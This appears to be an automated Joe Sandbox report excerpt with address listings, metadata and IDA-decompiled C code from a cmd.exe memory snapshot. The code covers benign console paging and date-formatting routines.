0x00da000f
0x00da000f
0x00da0017
0x00da0017
0x00d9ff92
0x00000000
0x00d9ff63
0x00d9feb1
0x00d9feb3
0x00d9feb8
0x00d9feba
0x00000000
0x00000000
0x00000000
0x00d9feba
0x00d9fa23
0x00d9fa29
0x00d9fa65
0x00d9fa6b
0x00d9fa6b
0x00d9fa2b
0x00d9fa2b
0x00d9fa2f
0x00d9fa33
0x00d9fa35
0x00d9fa3b
0x00d9fa40
0x00d9fa4b
0x00d9fa55
0x00d9fa55
0x00d9fa5a
0x00d9fa60
0x00d9fa60
0x00d9fa6e
0x00d9fa70
0x00d9fa75
0x00d9fa77
0x00d9fa7c
0x00d9fa80
0x00d9fa86
0x00d9fc60
0x00d9fc67
0x00d9fc69
0x00d9fc6b
0x00d9fc74
0x00d9fc76
0x00d9fc7a
0x00d9fc80
0x00d9feaa
0x00d9feaa
0x00d9feaa
0x00000000
0x00d9feaa
0x00d9fc86
0x00d9fc8d
0x00000000
0x00000000
0x00d9fc98
0x00d9fca2
0x00d9fcab
0x00d9fcb7
0x00d9fcc2
0x00d9fcc5
0x00d9fcdb
0x00d9fce0
0x00d9fce2
0x00d9fe8b
0x00d9fe90
0x00d9fe97
0x00d9fe9c
0x00d9fea3
0x00d9fea9
0x00000000
0x00d9fea9
0x00d9fce8
0x00d9fcef
0x00d9fcf1
0x00d9fcf3
0x00d9fcf3
0x00d9fd09
0x00d9fd0e
0x00d9fd10
0x00000000
0x00d9fd16
0x00d9fd16
0x00d9fd1d
0x00d9fd1f
0x00d9fd21
0x00d9fd21
0x00d9fd35
0x00d9fd3b
0x00d9fd3f
0x00d9fd42
0x00d9fd6f
0x00d9fd75
0x00d9fd7a
0x00d9fd7c
0x00d9fd7e
0x00d9fd94
0x00d9fd99
0x00d9fda4
0x00d9fdda
0x00d9fde5
0x00d9fe29
0x00d9fe2a
0x00d9fe2a
0x00d9fe2d
0x00d9fe32
0x00d9fe36
0x00d9fe38
0x00d9fe40
0x00d9fe49
0x00d9fe4e
0x00d9fe56
0x00d9fe5c
0x00d9fe65
0x00d9fe65
0x00d9fe6f
0x00d9fe76
0x00d9fe7b
0x00000000
0x00d9fe7b
0x00d9fdef
0x00d9fe00
0x00d9fe04
0x00d9fe06
0x00000000
0x00000000
0x00d9fe10
0x00d9fe10
0x00d9fe12
0x00d9fe19
0x00d9fe19
0x00d9fe21
0x00000000
0x00d9fe21
0x00d9fdae
0x00d9fdbf
0x00d9fdc3
0x00d9fdc5
0x00000000
0x00000000
0x00d9fdd1
0x00000000
0x00d9fdd1
0x00d9fd80
0x00000000
0x00d9fd44
0x00d9fd44
0x00d9fd49
0x00d9fd4e
0x00d9fd85
0x00d9fd85
0x00d9fe7f
0x00d9fe83
0x00000000
0x00d9fe83
0x00d9fd42
0x00d9fa8c
0x00d9fa8e
0x00d9fa9b
0x00d9faa1
0x00d9faad
0x00d9fab5
0x00d9fabd
0x00d9fac4
0x00d9facf
0x00d9fad2
0x00d9fae8
0x00d9faed
0x00d9faef
0x00d9fb08
0x00d9fb0d
0x00d9fb11
0x00d9fb13
0x00d9fb27
0x00d9fb2e
0x00d9fb30
0x00d9fb32
0x00d9fb32
0x00d9fb4c
0x00d9fb51
0x00d9fb53
0x00d9fc08
0x00d9fc10
0x00000000
0x00d9fb59
0x00d9fb59
0x00d9fb60
0x00d9fb62
0x00d9fb64
0x00d9fb64
0x00d9fb79
0x00d9fb7f
0x00d9fb81
0x00000000
0x00d9fb87
0x00d9fb95
0x00d9fb9b
0x00d9fb9d
0x00000000
0x00000000
0x00d9fb9f
0x00d9fba4
0x00d9fba6
0x00d9fc17
0x00d9fc17
0x00d9fc18
0x00d9fc1d
0x00d9fc1f
0x00d9fc24
0x00d9fc26
0x00d9fc2a
0x00d9fc2e
0x00d9fc33
0x00d9fc33
0x00d9fc39
0x00d9fc3f
0x00d9fc46
0x00d9fc46
0x00d9fc41
0x00d9fc41
0x00d9fc41
0x00d9fc4b
0x00d9fc50
0x00d9fc57
0x00d9fc5d
0x00d9fc5f
0x00000000
0x00d9fc5f
0x00d9fbce
0x00d9fbd4
0x00d9fbd6
0x00000000
0x00000000
0x00d9fbdf
0x00d9fbe9
0x00d9fbf7
0x00d9fc03
0x00d9fc05
0x00000000
0x00d9fc05
0x00d9fb81
0x00d9fb53
0x00d9fb1d
0x00000000
0x00d9fb1d
0x00d9faf9
0x00000000
0x00d9faf9
0x00d9fa86
0x00d9f9ee
0x00d965c6
0x00d965c6
0x00000000
0x00d965c6
0x00d965c1
0x00000000

Strings

[.], xrefs: 00D9FE8B
:, xrefs: 00D9FFB5
..., xrefs: 00D9FA77, 00D9FAF1, 00D9FB15, 00D9FC08, 00D9FC17
[...], xrefs: 00D9FD80
[..], xrefs: 00D9FD44

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID:
String ID: [...]$ [..]$ [.]$...$:
API String ID: 0-1980097535
Opcode ID: 92c1a31deda66d6956e399fabae4367d27e583e8c07f772ffbad23159b3f9439
Instruction ID: 6d30f9bc1832c1ba9ff3dd9a2dfc9498d36f5124f0261214267629dd93d1a66f
Opcode Fuzzy Hash: 92c1a31deda66d6956e399fabae4367d27e583e8c07f772ffbad23159b3f9439
Instruction Fuzzy Hash: A9129D702083429BDB24EF24C885AAFB7E9EF88704F04492DF589D7291EB34D945CB76

Uniqueness

Uniqueness Score: -1.00%

Function 00D8C5CA, Relevance: 30.2, APIs: 20, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00D8C5CA(void* __ecx, long __edx, void* _a4, signed int _a8) {
				signed int _v8;
				short _v16;
				short _v20;
				signed int _v26;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				signed int _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				long _v60;
				signed int _v64;
				void* _v68;
				long _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				char _v88;
				void* _v108;
				long _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t66;
				long _t68;
				long _t71;
				char* _t81;
				long _t85;
				intOrPtr _t88;
				signed int _t91;
				long _t93;
				long _t95;
				signed short _t100;
				struct _COORD _t105;
				void* _t114;
				void* _t115;
				long _t119;
				long _t122;
				signed int _t125;
				long _t128;
				void* _t138;
				void* _t141;
				void* _t143;
				signed int _t150;

				_t63 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t63 ^ _t150;
				_v64 = _a8;
				_t141 = __ecx;
				_v76 = __edx;
				_t137 = 0;
				_v72 = 0;
				_t66 = E00D9269C(_a8);
				if(_t66 == 0) {
					L13:
					_t114 = 0;
				} else {
					__imp___get_osfhandle(__edx);
					_t114 = _t66;
					if(GetConsoleScreenBufferInfo(_t114,  &_v32) == 0) {
						goto L13;
					} else {
						_t137 = _v16 - _v20 - 1;
						_v72 = _t137;
					}
				}
				_v60 = _v60 & 0x00000000;
				_t119 = E00D8C6F4(_t141, _a4, _v64);
				_t133 = 0xdbb980;
				_v64 = _t119;
				_t142 = _t119;
				_v68 = 0xdbb980;
				if(_t119 == 0) {
					_t68 = _v60;
					goto L11;
				} else {
					do {
						if(_t114 == 0) {
							_t119 = _v76;
							_t85 = E00D927C8(_t142 + _t142, _t133, _t142 + _t142,  &_v88);
							__eflags = _t85;
							if(_t85 == 0) {
								L16:
								_t68 = GetLastError();
								_v60 = _t68;
								break;
							} else {
								__eflags = _v88 - _t142 + _t142;
								if(_v88 == _t142 + _t142) {
									goto L9;
								} else {
									goto L16;
								}
							}
						} else {
							if( *0xdc8065 != 0) {
								_t128 =  *0xdc851c;
								__eflags = _t128 - _t137;
								if(_t128 < _t137) {
									L33:
									_t143 = _t133;
									_t88 = _t133 + _v64 * 2;
									_v84 = _t88;
									__eflags = _t133 - _t88;
									if(_t133 < _t88) {
										while(1) {
											__eflags = _t128 - _t137;
											if(_t128 >= _t137) {
												break;
											}
											_t91 =  *_t143 & 0x0000ffff;
											_t143 = _t143 + 2;
											__eflags = _t91 - 0xa;
											if(_t91 == 0xa) {
												_t128 = _t128 + 1;
												__eflags = _t128;
											}
											__eflags = _t143 - _v84;
											if(_t143 < _v84) {
												continue;
											}
											break;
										}
										 *0xdc851c = _t128;
									}
									_t142 = _t143 - _t133 >> 1;
									goto L8;
								} else {
									 *0xdc851c = 0;
									_t93 = GetConsoleScreenBufferInfo(_t114,  &_v32);
									__eflags = _t93;
									if(_t93 == 0) {
										L32:
										_t128 =  *0xdc851c;
										_t133 = _v68;
										goto L33;
									} else {
										_t95 = WriteConsoleW(_t114,  *0xdc8518,  *0xdc8514,  &_v60, 0);
										__eflags = _t95;
										if(_t95 == 0) {
											goto L32;
										} else {
											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
											GetConsoleMode(_t114,  &_v80);
											_t100 = SetConsoleMode(_t114, 0);
											__imp___getch();
											_t137 = _t100 & 0x0000ffff;
											SetConsoleMode(_t114, _v80);
											GetConsoleScreenBufferInfo(_t114,  &_v56);
											_t133 = _v32.dwSize * _v26;
											_push( &_v60);
											_t105 = _v32.dwCursorPosition;
											_push(_t105);
											_t142 = _v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition;
											_push(_v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition);
											_push(0x20);
											_push(_t114);
											FillConsoleOutputCharacterW();
											SetConsoleCursorPosition(_t114, _v32.dwCursorPosition);
											__eflags = (_t100 & 0x0000ffff) - 3;
											if((_t100 & 0x0000ffff) == 3) {
												EnterCriticalSection( *0xdb3858);
												 *0xdad544 = 1;
												LeaveCriticalSection( *0xdb3858);
												_t68 = 0;
												L12:
												return E00D96FD0(_t68, _t114, _v8 ^ _t150, _t133, _t137, _t142);
											} else {
												_t137 = _v72;
												goto L32;
											}
										}
									}
								}
							} else {
								_t142 = 0xa0;
								if(_t119 <= 0xa0) {
									_t142 = _t119;
								}
								L8:
								if(WriteConsoleW(_t114, _t133, _t142,  &_v60, 0) == 0) {
									_t68 = GetLastError();
								} else {
									L9:
									_t68 = 0;
								}
								goto L10;
							}
						}
						goto L55;
						L10:
						_t119 = _v64 - _t142;
						_v60 = _t68;
						_v64 = _t119;
						_t133 = _v68 + _t142 * 2;
						_v68 = _t133;
					} while (_t119 != 0);
					L11:
					if(_t68 != 0) {
						__eflags = _v76 - 2;
						if(__eflags != 0) {
							goto L12;
						} else {
							do {
								__eflags = E00D94B60(__eflags, 0);
							} while (__eflags == 0);
							exit(1);
							asm("int3");
							while(1) {
								L44:
								__eflags = _t133 - _t114;
								if(_t133 == _t114) {
									_t119 = _t119 + 2;
								}
								while(1) {
									_t134 = _t114;
									_t71 = E00D8D7D4(_t119, _t114);
									_t122 = _t71;
									__eflags = _t122;
									if(_t122 == 0) {
										break;
									}
									_t119 = _t122 + 2;
									_t133 =  *_t119 & 0x0000ffff;
									__eflags = _t133 - 0x31 - 8;
									if(_t133 - 0x31 > 8) {
										goto L44;
									} else {
										_t142 = _t142 + 1;
										continue;
									}
									L24:
									__eflags = _v8 ^ _t150;
									return E00D96FD0(_t76, _t115, _v8 ^ _t150, _t134, _t137, _t142);
									goto L55;
								}
								_t115 = _v108;
								__eflags = _t142 - _a4;
								if(_t142 > _a4) {
									_t115 = HeapAlloc(GetProcessHeap(), 0, _t142 << 2);
									__eflags = _t115;
									if(_t115 != 0) {
										_t125 = 0;
										__eflags = _t142;
										if(_t142 != 0) {
											_t138 = _v108;
											_t134 = _a4;
											do {
												__eflags = _t125 - _t134;
												if(_t125 >= _t134) {
													_t81 = " ";
												} else {
													 *_t138 =  *_t138 + 4;
													_t81 =  *( *_t138 - 4);
												}
												 *(_t115 + _t125 * 4) = _t81;
												_t125 = _t125 + 1;
												__eflags = _t125 - _t142;
											} while (_t125 < _t142);
											_t137 = _v112;
										}
										_t142 = FormatMessageW(0x3800, 0, _t137, 0, 0xdbb980, 0x2000, _t115);
										RtlFreeHeap(GetProcessHeap(), 0, _t115);
										goto L23;
									}
								} else {
									_push(_t115);
									_push(0x2000);
									_push(0xdbb980);
									_push(_t71);
									_push(_t137);
									_push(_t71);
									_push(0x1800);
									_t142 = FormatMessageW();
									L23:
									_t76 = _t142;
								}
								goto L24;
							}
						}
					} else {
						goto L12;
					}
				}
				L55:
			}

0x00d8c5d2
0x00d8c5d9
0x00d8c5e3
0x00d8c5e7
0x00d8c5e9
0x00d8c5ec
0x00d8c5f0
0x00d8c5f3
0x00d8c5fa
0x00d8c6b9
0x00d8c6b9
0x00d8c600
0x00d8c601
0x00d8c607
0x00d8c617
0x00000000
0x00d8c61d
0x00d8c627
0x00d8c628
0x00d8c628
0x00d8c617
0x00d8c62e
0x00d8c63c
0x00d8c63e
0x00d8c643
0x00d8c646
0x00d8c648
0x00d8c64d
0x00d8c6ef
0x00000000
0x00d8c653
0x00d8c653
0x00d8c655
0x00d8c6c4
0x00d8c6cb
0x00d8c6d0
0x00d8c6d2
0x00d8c6dc
0x00d8c6dc
0x00d8c6e2
0x00000000
0x00d8c6d4
0x00d8c6d7
0x00d8c6da
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8c6da
0x00d8c657
0x00d8c65e
0x00d9ad2a
0x00d9ad30
0x00d9ad32
0x00d9ae01
0x00d9ae04
0x00d9ae06
0x00d9ae09
0x00d9ae0c
0x00d9ae0e
0x00d9ae10
0x00d9ae10
0x00d9ae12
0x00000000
0x00000000
0x00d9ae14
0x00d9ae17
0x00d9ae1a
0x00d9ae1d
0x00d9ae1f
0x00d9ae1f
0x00d9ae1f
0x00d9ae20
0x00d9ae23
0x00000000
0x00000000
0x00000000
0x00d9ae23
0x00d9ae25
0x00d9ae25
0x00d9ae2d
0x00000000
0x00d9ad38
0x00d9ad3f
0x00d9ad45
0x00d9ad4b
0x00d9ad4d
0x00d9adf8
0x00d9adf8
0x00d9adfe
0x00000000
0x00d9ad53
0x00d9ad65
0x00d9ad6b
0x00d9ad6d
0x00000000
0x00d9ad73
0x00d9ad7c
0x00d9ad87
0x00d9ad8f
0x00d9ad95
0x00d9ad9e
0x00d9ada2
0x00d9adad
0x00d9adc2
0x00d9adc9
0x00d9adca
0x00d9add0
0x00d9adda
0x00d9addc
0x00d9addd
0x00d9addf
0x00d9ade0
0x00d9adea
0x00d9adf0
0x00d9adf3
0x00d9ae3a
0x00d9ae46
0x00d9ae50
0x00d9ae56
0x00d8c6a6
0x00d8c6b6
0x00d9adf5
0x00d9adf5
0x00000000
0x00d9adf5
0x00d9adf3
0x00d9ad6d
0x00d9ad4d
0x00d8c664
0x00d8c664
0x00d8c66f
0x00d8c671
0x00d8c671
0x00d8c673
0x00d8c684
0x00d8c6e7
0x00d8c686
0x00d8c686
0x00d8c686
0x00d8c686
0x00000000
0x00d8c684
0x00d8c65e
0x00000000
0x00d8c688
0x00d8c68e
0x00d8c690
0x00d8c693
0x00d8c696
0x00d8c699
0x00d8c699
0x00d8c69e
0x00d8c6a0
0x00d9ae5d
0x00d9ae61
0x00000000
0x00d9ae67
0x00d9ae67
0x00d9ae6e
0x00d9ae6e
0x00d9ae74
0x00d9ae7a
0x00d9ae7b
0x00d9ae7b
0x00d9ae7b
0x00d9ae7e
0x00d9ae84
0x00d9ae84
0x00d8c74b
0x00d8c74b
0x00d8c74d
0x00d8c752
0x00d8c754
0x00d8c756
0x00000000
0x00000000
0x00d8c794
0x00d8c797
0x00d8c79d
0x00d8c7a1
0x00000000
0x00d8c7a7
0x00d8c7a7
0x00000000
0x00d8c7a7
0x00d8c781
0x00d8c786
0x00d8c791
0x00000000
0x00d8c791
0x00d8c758
0x00d8c75b
0x00d8c75e
0x00d9aea1
0x00d9aea3
0x00d9aea5
0x00d9aeab
0x00d9aead
0x00d9aeaf
0x00d9aeb1
0x00d9aeb4
0x00d9aeb7
0x00d9aeb7
0x00d9aeb9
0x00d9aec5
0x00d9aebb
0x00d9aebb
0x00d9aec0
0x00d9aec0
0x00d9aeca
0x00d9aecd
0x00d9aece
0x00d9aece
0x00d9aed2
0x00d9aed2
0x00d9aef3
0x00d9aefc
0x00000000
0x00d9aefc
0x00d8c764
0x00d8c764
0x00d8c765
0x00d8c76a
0x00d8c76f
0x00d8c770
0x00d8c771
0x00d8c772
0x00d8c77d
0x00d8c77f
0x00d8c77f
0x00d8c77f
0x00000000
0x00d8c75e
0x00d9ae7b
0x00000000
0x00000000
0x00000000
0x00d8c6a0
0x00000000

APIs

Part of subcall function 00D9269C: _get_osfhandle.MSVCRT ref: 00D926A7
Part of subcall function 00D9269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D8C5F8,?,?,?), ref: 00D926B6
Part of subcall function 00D9269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926D2
Part of subcall function 00D9269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,00000002), ref: 00D926E1
Part of subcall function 00D9269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D926EC
Part of subcall function 00D9269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D926F5

_get_osfhandle.MSVCRT ref: 00D8C601
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00D8C5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,00D8C5C6), ref: 00D8C60F
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00DBB980,000000A0,00000000,00000000,?,?,?,?,?), ref: 00D8C67C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 00D8C6DC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8C6E7

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
String ID:
API String ID: 2173784998-0
Opcode ID: 2334bd5b54f5a458514b2fd44d1d4f1a7f6f96955fffb4855765eb95904fbcfa
Instruction ID: e8a0fb5889b7c0677ba9fcae8644a104785b2fddf4013fa5dd2b821f1c444339
Opcode Fuzzy Hash: 2334bd5b54f5a458514b2fd44d1d4f1a7f6f96955fffb4855765eb95904fbcfa
Instruction Fuzzy Hash: D2817572A0021AEFCF149FA4DC99DBEB7B9EB44311F145026F906D6250EB709D45DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D85AEF, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 367
timeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00D85AEF(void* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				signed int _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t78;
				intOrPtr _t89;
				void* _t90;
				signed int _t96;
				signed int _t97;
				void* _t100;
				void* _t101;
				void* _t110;
				void* _t111;
				signed short _t118;
				long _t128;
				short* _t130;
				void* _t136;
				signed int _t139;
				void* _t143;
				void _t145;
				void _t149;
				signed int _t157;
				signed int _t159;
				signed int _t161;
				int _t164;
				void* _t172;
				signed int _t173;
				signed int _t181;
				signed int _t185;
				void* _t186;
				void* _t189;
				intOrPtr _t197;
				signed int _t202;
				void* _t206;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t78 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t78 ^ _t212;
				_t157 = _a4;
				_v364 = __edx;
				_v368 = _t157;
				_v360 = 1;
				if(__ecx != 0) {
					_t161 = 9;
					memcpy( &_v420, __ecx, _t161 << 2);
					_t213 = _t213 + 0xc;
					E00DA3C49( &_v420,  &_v376);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v376);
				}
				FileTimeToLocalFileTime( &_v376,  &_v384);
				FileTimeToSystemTime( &_v384,  &_v348);
				_v352 = 0;
				if( *0xdc3cc9 == 0) {
					_t194 = _v348 & 0x0000ffff;
					_t208 = _v346 & 0x0000ffff;
					_t206 = _v342 & 0x0000ffff;
					_v352 = _t194;
					if(_v364 == 0) {
						_t181 = 0x64;
						_t194 = _t194 % _t181;
						_v352 = _t194;
					}
					_t89 =  *0xdad540; // 0x0
					if(_t89 != 2) {
						if(_t89 == 1) {
							_t110 = _t208;
							_t208 = _t206;
							_t206 = _t110;
						}
					} else {
						_t111 = _t194;
						_t194 = _t206;
						_t206 = _t208;
						_v352 = _t194;
						_t208 = _t111;
					}
					_t164 =  *0xdad598; // 0x0
					if(_t164 >= 0x20) {
						_t90 =  *0xdad594; // 0x0
						goto L63;
					} else {
						_t90 = realloc( *0xdad594, 0x40);
						_pop(0);
						if(_t90 != 0) {
							_t194 = _v352;
							_t164 = 0x20;
							 *0xdad594 = _t90;
							 *0xdad598 = _t164;
							L63:
							_push(_t194);
							_push(0xdaf80c);
							_push(_t206);
							_push(0xdaf80c);
							E00D9274C(_t90, _t164, L"%02d%s%02d%s%02d", _t208);
							_t213 = _t213 + 0x20;
							_t206 = 2;
							goto L35;
						}
						_push(_t90);
						goto L50;
					}
				} else {
					_v356 = 0;
					if(GetLocaleInfoW(E00D941A4(), 0x1f,  &_v332, 0x80) == 0) {
						_t194 = 0x80;
						E00D91040( &_v332, 0x80,  *0xdaf7f8);
					}
					_t118 = _v332;
					_t210 =  &_v332;
					_t206 = 2;
					if(_t118 == 0) {
						L13:
						if(GetDateFormatW(E00D941A4(), 0,  &_v348,  &_v332,  *0xdad594,  *0xdad598) == 0) {
							L32:
							_t208 = GetDateFormatW(E00D941A4(), 0,  &_v348,  &_v332, 0, 0);
							if(_t208 == 0) {
								_t128 = GetLastError();
								_push(0);
								L48:
								 *0xdc3cf0 = _t128;
								_push(_t128);
								L51:
								E00D8C5A2(0);
								_t97 = 0;
								L25:
								return E00D96FD0(_t97, _t157, _v8 ^ _t212, _t194, _t206, _t208);
							}
							_t208 = _t208 + 1;
							_t130 = realloc( *0xdad594, _t208 + _t208);
							_pop(0);
							if(_t130 == 0) {
								_push(0);
								L50:
								_push(8);
								goto L51;
							}
							 *0xdad594 = _t130;
							 *0xdad598 = _t208;
							_t208 = 0;
							if(GetDateFormatW(E00D941A4(), 0,  &_v348,  &_v332, _t130, 0) == 0) {
								_t128 = GetLastError();
								_push(0);
								goto L48;
							}
							L35:
							_t208 =  *0xdad594; // 0x0
							L15:
							_push(E00D85AA7(_v344 & 0x0000ffff));
							_t194 = 0x20;
							E00D91040( &_v76, _t194);
							if(_t157 == 0) {
								if(_v360 != 0) {
									if(E00D868B5() == 0) {
										_push(_t208);
										_push( &_v76);
									} else {
										_push( &_v76);
										_push(_t208);
									}
									_t96 = E00D925D9(L"%s %s ");
								} else {
									_push(_t208);
									_t96 = E00D925D9(L"%s ");
								}
								_t157 = _t96;
								L24:
								_t97 = _t157;
								goto L25;
							}
							if(_v360 == 0 || _v364 != 1) {
								E00D91040(_t157, _a8, _t208);
							} else {
								_t101 = E00D868B5();
								_t197 = _a8;
								_t173 = _t157;
								if(_t101 != 0) {
									E00D91040(_t173, _t197, _t208);
									E00D918C0(_t157, _a8, " ");
									_push( &_v76);
								} else {
									E00D91040(_t173, _t197,  &_v76);
									E00D918C0(_t157, _a8, " ");
									_push(_t208);
								}
								E00D918C0(_t157, _a8);
							}
							_t172 = _t157 + 2;
							_t194 = 0;
							do {
								_t100 =  *_t157;
								_t157 = _t206 + _t157;
							} while (_t100 != 0);
							_t157 = _t157 - _t172 >> 1;
							goto L24;
						}
						_t208 =  *0xdad594; // 0x0
						if(_t208 == 0) {
							goto L32;
						}
						goto L15;
					} else {
						_t159 = _v356;
						_t185 = _t118 & 0x0000ffff;
						_t136 = 0x64;
						do {
							if(_t185 == 0x27) {
								_t210 = _t210 + _t206;
								_t159 = 0 | _t159 == 0x00000000;
								goto L11;
							}
							if(_t159 != 0 || _t185 != _t136 && _t185 != 0x4d) {
								_t210 = _t210 + _t206;
							} else {
								_t202 = 0;
								do {
									_t210 = _t210 + _t206;
									_t202 = _t202 + 1;
								} while ( *_t210 == _t185);
								_v356 = _t210;
								_t211 = _t210 +  ~_t202 * 2;
								if(_t202 != 1) {
									_t143 = 0x64;
									if(_t185 == _t143) {
										_v360 = 0;
									}
									if(_t202 <= 3) {
										_t210 = _v356;
									} else {
										_t194 = _v356;
										_t186 = _t194;
										_v356 = _t186 + 2;
										do {
											_t145 =  *_t186;
											_t186 = _t186 + _t206;
										} while (_t145 != _v352);
										_t210 = _t211 + 6;
										memmove(_t210, _t194, 2 + (_t186 - _v356 >> 1) * 2);
										_t213 = _t213 + 0xc;
									}
									goto L11;
								}
								_t189 = _t211;
								_t194 = _t189 + 2;
								do {
									_t149 =  *_t189;
									_t189 = _t189 + _t206;
								} while (_t149 != _v352);
								memmove(_t211 + 2, _t211, 2 + (_t189 - _t194 >> 1) * 2);
								_t213 = _t213 + 0xc;
								_t210 = _t211 + 4;
							}
							L11:
							_t139 =  *_t210 & 0x0000ffff;
							_t185 = _t139;
							_t136 = 0x64;
						} while (_t139 != 0);
						_t157 = _v368;
						goto L13;
					}
				}
			}

0x00d85afa
0x00d85b01
0x00d85b05
0x00d85b0b
0x00d85b11
0x00d85b17
0x00d85b24
0x00d99ae4
0x00d99aeb
0x00d99aeb
0x00d99af9
0x00d85b2a
0x00d85b31
0x00d85b45
0x00d85b45
0x00d85b59
0x00d85b6d
0x00d85b75
0x00d85b81
0x00d99bba
0x00d99bc1
0x00d99bc8
0x00d99bcf
0x00d99bdb
0x00d99be3
0x00d99be4
0x00d99be6
0x00d99be6
0x00d99bec
0x00d99bf4
0x00d99c09
0x00d99c0b
0x00d99c0d
0x00d99c0f
0x00d99c0f
0x00d99bf6
0x00d99bf6
0x00d99bf8
0x00d99bfa
0x00d99bfc
0x00d99c02
0x00d99c02
0x00d99c11
0x00d99c1a
0x00d99c4c
0x00000000
0x00d99c1c
0x00d99c24
0x00d99c2b
0x00d99c2e
0x00d99c36
0x00d99c3e
0x00d99c3f
0x00d99c44
0x00d99c51
0x00d99c51
0x00d99c57
0x00d99c58
0x00d99c59
0x00d99c62
0x00d99c67
0x00d99c6c
0x00000000
0x00d99c6c
0x00d99c30
0x00000000
0x00d99c30
0x00d85b87
0x00d85b87
0x00d85baa
0x00d99b09
0x00d99b11
0x00d99b11
0x00d85bb0
0x00d85bb7
0x00d85bbf
0x00d85bc3
0x00d85c07
0x00d85c32
0x00d85d34
0x00d85d53
0x00d85d57
0x00d99b8d
0x00d99b95
0x00d99b9f
0x00d99b9f
0x00d99ba4
0x00d99bac
0x00d99bac
0x00d99bb3
0x00d85cca
0x00d85cda
0x00d85cda
0x00d85d5d
0x00d85d68
0x00d85d6f
0x00d85d72
0x00d99ba9
0x00d99baa
0x00d99baa
0x00000000
0x00d99baa
0x00d85d7a
0x00d85d8c
0x00d85d93
0x00d85da4
0x00d99b98
0x00d99b9e
0x00000000
0x00d99b9e
0x00d85daa
0x00d85daa
0x00d85c46
0x00d85c52
0x00d85c55
0x00d85c59
0x00d85c60
0x00d99c79
0x00d99c94
0x00d99c9a
0x00d99c9b
0x00d99c96
0x00d99c96
0x00d99c97
0x00d99c97
0x00d99ca1
0x00d99c7b
0x00d99c7b
0x00d99c81
0x00d99c87
0x00d99ca9
0x00d85cc8
0x00d85cc8
0x00000000
0x00d85cc8
0x00d85c6d
0x00d99cd4
0x00d85c80
0x00d85c80
0x00d85c85
0x00d85c88
0x00d85c8c
0x00d99cb1
0x00d99cc0
0x00d99cc8
0x00d85c92
0x00d85c96
0x00d85ca5
0x00d85caa
0x00d85caa
0x00d85cb0
0x00d85cb0
0x00d85cb5
0x00d85cb8
0x00d85cba
0x00d85cba
0x00d85cbd
0x00d85cbf
0x00d85cc6
0x00000000
0x00d85cc6
0x00d85c38
0x00d85c40
0x00000000
0x00000000
0x00000000
0x00d85bc5
0x00d85bc5
0x00d85bcd
0x00d85bd0
0x00d85bd1
0x00d85bd5
0x00d99b1d
0x00d99b24
0x00000000
0x00d99b24
0x00d85bdd
0x00d85bf2
0x00d85cdd
0x00d85cdf
0x00d85ce1
0x00d85ce1
0x00d85ce3
0x00d85ce4
0x00d85ceb
0x00d85cf3
0x00d85cf9
0x00d99b2d
0x00d99b31
0x00d99b35
0x00d99b35
0x00d99b3e
0x00d99b82
0x00d99b40
0x00d99b40
0x00d99b46
0x00d99b4b
0x00d99b51
0x00d99b51
0x00d99b54
0x00d99b56
0x00d99b65
0x00d99b74
0x00d99b7a
0x00d99b7a
0x00000000
0x00d99b3e
0x00d85cff
0x00d85d01
0x00d85d04
0x00d85d04
